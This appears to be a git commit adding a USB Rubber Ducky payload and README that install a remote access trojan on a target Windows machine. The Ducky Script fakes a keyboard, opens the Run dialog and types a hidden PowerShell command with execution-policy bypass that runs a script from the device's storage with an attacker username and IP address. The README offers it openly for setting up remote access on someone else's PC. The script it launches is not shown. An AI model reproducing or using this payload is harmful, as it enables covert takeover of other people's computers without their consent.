cribb-it 2024-09-25 04:58:18 +00:00 committed by GitHub
commit e687deb799
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 122 additions and 0 deletions

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,41 @@
REM TITLE R.A.T
REM AUTHOR TRIBBIC
REM DESCRIPTION Set up a R.A.T on the target windows machine
REM DUCKY SCRIPT 3
REM USERNAME to login to the R.A.T
DEFINE #USERNAME name
REM Your IP Address use https://www.ipchicken.com/ to get your IP
DEFINE #IPADDRESS 192.168.1.1
ATTACKMODE HID STORAGE
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
GUI r
DELAY 200
STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1')

View File

@ -0,0 +1,22 @@
# RAT
- Author: TRIBBIC
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Execution
- Attackmode: HID & Storage
- Ducky Script Version: 3
## Setup
In the payload.txt change the two DEFINE's
\#USERNAME Should be your login name
\#IPADDRESS Should be your IP Address
## Description
Create a R.A.T using Windows Powershell on Targets PC
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |